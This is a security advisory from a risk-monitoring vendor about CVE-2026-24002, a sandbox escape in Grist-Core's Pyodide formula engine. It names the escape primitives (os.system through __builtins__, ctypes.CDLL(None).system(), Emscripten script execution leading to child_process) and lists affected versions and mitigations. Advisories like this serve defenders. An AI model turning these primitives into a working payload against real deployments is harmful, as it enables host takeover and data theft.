Executive Summary

A critical vulnerability, CVE-2026-24002 (dubbed "Cellbreak"), has been identified in Grist-Core, a widely used programmable spreadsheet platform. This flaw enables remote code execution (RCE) through malicious spreadsheet formulas, allowing attackers to escape the Pyodide sandbox and execute arbitrary operating system commands or JavaScript on the host. Both SaaS and self-hosted deployments of Grist-Core are at risk. The vulnerability’s high severity (CVSS 9.1) and ease of exploitation make it a significant threat, with the potential to expose sensitive data, compromise credentials, and facilitate lateral movement within affected environments. Immediate action is required to mitigate the risk, especially for organizations relying on collaborative or automated spreadsheet workflows.

Technical Information

CVE-2026-24002 is a sandbox escape vulnerability in Grist-Core’s formula engine, which leverages the Pyodide (WebAssembly-based Python) runtime to execute user-supplied Python code within spreadsheet cells. The intended security boundary is the Pyodide sandbox, but researchers at Cyera Research Labs discovered that this isolation can be bypassed through several advanced exploitation techniques.

The vulnerability stems from incomplete sandboxing of the Python execution environment. Attackers can exploit Python’s introspective capabilities and the availability of certain modules to traverse the object hierarchy, access sensitive built-ins, and ultimately invoke system-level functions. The most critical exploitation vectors include:

Attackers can use Python’s object model to access the __builtins__ namespace, import the os module, and invoke os.system() to execute arbitrary shell commands. This is possible because the Pyodide sandbox does not sufficiently restrict access to these core Python features.

The ctypes module, which provides C-compatible data types and allows calling functions in DLLs or shared libraries, is accessible within the sandbox. By invoking ctypes.CDLL(None).system(), an attacker can directly call the system’s libc system() function, bypassing Python-level restrictions.

The Emscripten runtime, which underpins Pyodide, exposes functions such as emscripten_run_script_string(). This allows attackers to execute arbitrary JavaScript in the context of the host environment, potentially enabling further exploitation such as invoking Node.js modules (e.g., require('child_process')) for deeper system compromise.

A proof-of-concept exploit demonstrates that a single malicious spreadsheet formula can trigger these vectors, resulting in full host compromise. The attack can be delivered via spreadsheet file upload, formula injection, or collaborative editing, making it difficult to distinguish from legitimate user activity.

The impact of successful exploitation is severe. Attackers can access environment variables, configuration files, and sensitive data stored on the host. In multi-tenant SaaS deployments, a single exploit can compromise the vendor’s control plane, affecting all customers. The ability to execute arbitrary code also enables attackers to establish persistence, escalate privileges, and move laterally within the network.

Exploitation in the Wild

As of the latest intelligence, there are no confirmed reports of active exploitation in the wild. However, public proof-of-concept code and detailed technical write-ups are readily available, significantly lowering the barrier to exploitation. Security researchers and the broader infosec community have discussed the vulnerability extensively on platforms such as Reddit, The Hacker News, and Infosecurity Magazine. The availability of exploit code and the high-profile nature of the vulnerability increase the likelihood of opportunistic and targeted attacks in the near future.

Organizations in sectors such as government, higher education, and commercial SaaS have been identified as particularly at risk, given their reliance on collaborative spreadsheet platforms and the prevalence of Grist-Core in these environments. The attack surface is broad, encompassing both cloud-hosted and on-premises deployments.

APT Groups using this vulnerability

At this time, there is no public attribution of CVE-2026-24002 exploitation to specific Advanced Persistent Threat (APT) groups. However, the techniques enabled by this vulnerability—remote code execution via document-based payloads, sandbox escape, and lateral movement—are consistent with the tradecraft of APTs targeting SaaS, automation platforms, and organizations with collaborative workflows. The MITRE ATT&CK techniques mapped to this vulnerability include T1059.006 (Command and Scripting Interpreter: Python), T1203 (Exploitation for Client Execution), T1071 (Application Layer Protocol for exfiltration), and T1569.002 (System Services: Service Execution). Given the criticality and potential impact, it is highly likely that both financially motivated and state-sponsored actors will seek to weaponize this vulnerability.

Affected Product Versions

The vulnerability affects all versions of Grist-Core prior to 1.7.9. This includes both SaaS and self-hosted deployments. The issue is resolved in Grist-Core version 1.7.9 and later, where formula execution is isolated using the Deno runtime, which enforces a stricter permission model and blocks sensitive operations by default.

Organizations running any version of Grist-Core earlier than 1.7.9 are at risk. It is critical to note that even after upgrading, if the environment variable GRIST_PYODIDE_SKIP_DENO is set to 1, the patch is bypassed and the system remains vulnerable. Therefore, both version and configuration must be verified to ensure effective mitigation.

Workaround and Mitigation

The primary mitigation is to upgrade to Grist-Core version 1.7.9 or later. This release introduces Deno-based isolation for Pyodide formula execution, leveraging Deno’s permission model to block unauthorized system access. After upgrading, administrators must ensure that the environment variable GRIST_PYODIDE_SKIP_DENO is not set to 1, as this disables the new security controls and leaves the system exposed.

In addition to patching, organizations should restrict formula creation and modification privileges to trusted users only. All imported or uploaded spreadsheets should be audited for suspicious or complex Python formulas, particularly those that reference built-in modules, ctypes, or unusual object traversal patterns. Running Grist-Core with the least privilege principle—limiting access to sensitive environment variables, files, and network resources—further reduces the potential impact of exploitation.

Continuous monitoring for indicators of compromise is essential. These include unusual outbound network connections from Grist-Core hosts, unexpected processes spawned by the Grist service user, and access logs showing uploads or imports of untrusted spreadsheets. Automated detection rules and behavioral analytics can help identify early signs of exploitation.

References

Cyera Research Labs: Cellbreak Technical Write-up, NVD: CVE-2026-24002, Grist Security Advisory GHSA-7xvx-8pf2-pv5g, The Hacker News Coverage, Infosecurity Magazine, Reddit: r/pwnhub, Video PoC, radar.offseq.com Threat Entry.

Rescana is here for you

Rescana is committed to helping organizations manage third-party risk and maintain robust cybersecurity postures. Our TPRM platform provides continuous monitoring, automated risk assessment, and actionable insights to help you stay ahead of emerging threats. We encourage all customers to review their exposure to Grist-Core and other collaborative platforms, and to implement the recommended mitigations promptly. For any questions, incident response needs, or further guidance, our cybersecurity team is available at ops@rescana.com.